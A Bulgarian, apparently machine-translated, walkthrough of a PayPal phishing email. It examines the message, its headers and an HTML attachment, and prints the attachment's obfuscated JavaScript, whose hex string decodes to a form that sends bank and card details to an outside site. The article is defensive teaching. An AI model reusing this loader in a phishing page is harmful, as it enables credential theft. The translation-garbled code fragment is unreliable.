В днешния свят, където информацията на всеки е онлайн, фишингът е една от най-популярните и опустошителни онлайн атаки, защото винаги можете да почистите вирус, но ако банковите ви детайли са откраднати, имате проблеми. Ето разбивка на една такава атака, която получихме.
Не мислете, че вашите банкови детайли са важни: в края на краищата, ако някой получи контрол върху данните за вход в профила ви, те не само знаят информацията, съдържаща се в този профил, но шансовете са, че същите данни за вход могат да се използват в различни други сметки. И ако те компрометират вашия имейл акаунт, те могат да възстановят всички ваши други пароли.
Така че, в допълнение към поддържането на силни и различни пароли, трябва винаги да сте нащрек за фалшиви имейли, маскирани като истинско нещо. Докато повечето фишинг опити са аматьорски, някои са доста убедителни, така че е важно да разберете как да ги разпознавате на повърхностно ниво, както и как работят под качулката.
Изображение от asirap
Примерният ни имейл, както повечето опити за фишинг, ви уведомява за активността ви в профила Ви в PayPal, която при нормални обстоятелства би била тревожна. Така че призивът за действие е да проверите / възстановите профила си, като изпратите точно всяка част от личната информация, която можете да си представите. Отново, това е доста формулировка.
Въпреки че със сигурност има изключения, почти всеки phishing и измамен имейл е зареден с червени знамена директно в съобщението. Дори ако текстът е убедителен, обикновено можете да намерите много грешки, които са покрити в цялото тяло на съобщението, което показва, че съобщението не е легитимно.
Органът на съобщенията
На пръв поглед това е един от най-добрите фишинг имейли, които съм виждал. Няма правописни или граматически грешки и верността се чете според това, което може да очаквате. Има обаче няколко червени знамена, които можете да видите, когато разгледате съдържанието малко по-отблизо.
Заглавието на съобщението
Когато прегледате заглавката на съобщението, се появяват още няколко червени знамена:
Приложението
Когато отворя прикачения файл, можете веднага да видите, че оформлението не е правилно, тъй като липсва информация за стила. Отново, защо PayPal ще изпрати имейл на HTML формуляр, когато те могат просто да ви дадат линк на сайта си?
Забележка: ние използвахме вградения инструмент за визуализиране на прикачени файлове в Gmail за това, но бихме ви препоръчали да не отваряте прикачените файлове от измамници. Никога. Някога. Те много често съдържат експлойти, които ще инсталират троянци на вашия компютър, за да откраднат информацията за вашия акаунт.
Разглеждайки малко по-малко, можете да видите, че този формуляр иска не само информацията за вход в PayPal, но и информацията за банкови и кредитни карти. Някои от изображенията са счупени.
Очевидно е, че този опит за фишинг се случва след всичко с един удар.
Макар да е съвсем ясно, въз основа на това, което е ясно, че това е опит за фишинг, сега ще разбием техническата изработка на имейла и ще видим какво можем да намерим.
Информация от прикачения файл
Първото нещо, което трябва да разгледате, е HTML източникът на прикачения файл, който предава данните на фалшивия сайт.
При бързо преглеждане на източника всички връзки изглеждат валидни, тъй като сочат към "paypal.com" или "paypalobjects.com", които са едновременно легитимни.
Сега ще разгледаме основната информация, която Firefox събира на страницата.
Както можете да видите, някои от графиките са изтеглени от домейните "blessedtobe.com", "goodhealthpharmacy.com" и "pic-upload.de" вместо законните домейни на PayPal.
Информация от заглавията на имейлите
След това ще разгледаме заглавията на необработените имейл съобщения. Gmail го прави достъпен чрез опцията Показване на оригинала в съобщението.
Ако погледнете информацията за заглавката на оригиналното съобщение, можете да видите, че това съобщение е съставено чрез Outlook Express 6. Съмнявам се, че PayPal има служител, който изпраща ръчно всеки един от тези съобщения чрез остарял имейл клиент.
Сега, гледайки информацията за маршрута, можем да видим IP адреса както на подателя, така и на сървъра за препредаване на поща.
IP адресът "Потребител" е оригинален подател. Като направим бързо търсене на информацията за IP, можем да видим, че изпращащият IP адрес е в Германия.
И когато се вгледаме в сървъра за препредаване на поща (mail.itak.at), IP адрес, можем да видим, че това е интернет доставчик, базиран в Австрия. Съмнявам се, че PayPal маршрутизира имейлите си директно през австрийски доставчик на интернет услуги, когато имат масивна сървърна ферма, която лесно може да се справи с тази задача.
Къде отиват данните?
Затова ясно определихме, че това е phishing имейл и събра известна информация за това, откъде идва съобщението, но какво ще кажете къде се изпращат данните ви?
За да видите това, първо трябва да запазим прикачения файл HTM на нашия работен плот и да го отворим в текстов редактор. Преминавайки през него, всичко изглежда да е наред, освен когато стигнем до подозрителен блок Javascript.
Разбирайки пълния източник на последния блок от Javascript, виждаме:
// Авторско право © 2005 Voormedia - WWW.VOORMEDIA.COM
Var I, Y, X = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; у = "за (I = 0; и<>
Всеки път, когато виждате голям набор от привидно случайни букви и цифри, вградени в Javascript блок, обикновено това е нещо подозрително. При разглеждането на кода, променливата "x" се задава на този голям низ и след това се декодира в променливата "y". Крайният резултат от променливата "y" след това се записва в документа като HTML.
Тъй като големият низ е направен от номера 0-9 и буквите a-f, най-вероятно е кодиран чрез просто ASCII to Hex преобразуване:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Превежда на:
Не е случайно, че това се декодира в валиден HTML формуляр, който изпраща резултатите не до PayPal, а до неправилен сайт.
Освен това, когато прегледате HTML източника на формуляра, ще видите, че този маркер на формуляра не се вижда, защото е генериран динамично чрез Javascript. Това е умен начин да скриете действието на HTML, ако някой просто е прегледал генерирания източник на прикачения файл (както направихме по-рано), за разлика от отварянето на прикачения файл директно в текстов редактор.
При пускането на бърз клиент на нарушения сайт можем да видим, че това е домейн, хостван на популярен уеб хост, 1and1.
Това, което се откроява, е, че домейнът използва четливо име (за разлика от нещо като "dfh3sjhskjhw.net") и домейнът е регистриран за 4 години. Поради това смятам, че този домейн беше отвлечен и използван като пешка в този фишинг опит.
Когато става въпрос за безопасно онлайн, никога не боли да имаш малко цинизъм.
Докато съм сигурен, че в примерния имейл има повече червени знамена, това, което сме посочили по-горе, са показателите, които видяхме след няколко минути от проверката. Хипотетично, ако нивото на повърхността на електронната поща е имитирала легитимния си еквивалент на 100%, техническият анализ щеше да разкрие истинската му същност. Ето защо е важно да проучите какво можете и не можете да видите.